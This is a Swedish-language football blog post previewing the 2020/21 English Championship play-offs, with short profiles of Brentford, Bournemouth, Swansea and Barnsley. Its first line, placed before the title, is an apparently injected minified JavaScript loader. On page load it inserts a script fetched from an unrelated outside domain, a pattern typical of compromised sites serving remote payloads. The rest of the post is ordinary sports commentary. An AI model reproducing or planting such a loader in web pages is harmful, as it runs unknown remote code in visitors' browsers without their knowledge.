;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start of the week – Championship play-offs – FMSweden
Meny Stäng

Start of the week – Championship play-offs

Ligorna ute i Europa går mot sitt slut och för alla oss som följer den engelska fotbollen i huvudsak är det läge att släppa Premier League. Visst, det finns en kamp om Europaplatser. Men visst fan känns PL rätt avslagen just nu?! Grattis till Manchester City som vinner. Nu riktar jag i alla fall, allt mitt fokus mot något mycket viktigare. Championship.

Norwich och Watford är klart för spel i Premier League säsongen 2021/2022. Lag 3–6 spelar play-off om den tredje platsen till Premier League. Vilka det blir står också klart med 2 omgångar kvar. Jaha? Allt är redan klart här också alltså? Så skulle man kunna se på saken men då är man såklart ute och cyklar. Det är nu det absolut bästa på hela fotbollsåret börjar. Lagen ska vässa formen. Lagen kan redan nu börja scouta dem tre övriga lag som är klara för play-off. Man får som neutral, tid på sig att hitta sitt lag att hålla på i slutspelet som väntar. Det är nu det roliga börjar och det sker i Championship.

Vilka är lagen då?

Brentford 

Är det Brentfords år i år? Det är frågan som alla ställer sig. Det här speciella projektet har pågått ett tag nu och nästa steg är att ta klivet upp i Premier League men att knipa någon av direktplatserna har återigen Brentford misslyckats med. Det kryssas alldeles för mycket men dem kliver in i detta play-off som favoriter att gå upp. Mycket skandinaver i truppen och visst vore det fint om Pontus Jansson skulle få bli av med det Premier League-spöke som skapats kring han, efter misslyckandet i, först Leeds men också efter finalförlusten senast mot Fulham med Brentford. Dem har ligans skyttekung Ivan Toney som i skrivande stund smällt in mäktiga 29 pytsar.

Spelare att hålla ett extra öga på: Ivan Toney

Resterande schema: Rotherham (H), Watford (H), Bristol City (A)

Bournemouth

Bournemouth har haft en ganska turbulent säsong med sparkad tränare och svaga resultat men sedan Jonathan Woodgate tagit över som huvudtränare har dem fått ordning på grejerna och går in i dem två sista matcherna med en väldigt stark form trots förlust senast mot Brentford. Offensivt viktat lag som tillsammans med Brentford gör flest mål i ligan. Mycket Premier League rutin i truppen, Asmir Begovic och Jack Wilshere för att nämna två.

Spelare att hålla ett extra öga på: Arnaut Danjuma

Resterande schema: Wycombe (A), Stoke (H)

Swansea

Svanarna från Wales är ramstarka och har ligans tredje bästa försvar när det kommer till insläppta mål per match. Få spelare som sticker ut kvalitetsmässigt. Andre Ayew leder den interna skytteligan. Enligt mig känns Swansea svårplacerade. Blandat och gett under säsongen men nu handlar allt om att få träff i tre matcher. Noterbart är två poäng på de senaste tre matcherna så svanarna behöver verkligen höja sig.

Spelare att hålla ett extra öga på: Jamal Lowe

Resterande schema: Derby (H), Watford (A)

Barnsley

Barnsley är den stora skrällen i årets play-off. Det var så sent som säsongen 2018/2019 som Barnsley var nykomling i Championship. Ett lag som på senare år har studsat mellan League One och Championship. Valérien Ismaël heter tränaren och han räds inte att göra tidiga byten ifall spelet inte stämmer i första halvlek. Barnsley är mitt lag i detta play-off. Man älskar ju en underdog men sen har jag också varit på Oakwell och såg Barnsley i League One säsongen 2017/2018.

Spelare att hålla ett extra öga på: Alex Mowatt

Resterande schema: Preston (A), Norwich (H)

3:an i tabellen börjar borta mot 6:an i ett dubbelmöte och detsamma gäller såklart 4:an och 5:an. Ingen bortamålsregel. Lagen som går segrande ur semifinalerna ställs mot varandra i den finaste matchen som finns. Finalen på Wembley. Välj ert lag. Bunkra upp med snacks och läsk eller vad man nu behagar att inmundiga när det spelas fotboll och häng med! Championship play-offs är snart här.

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar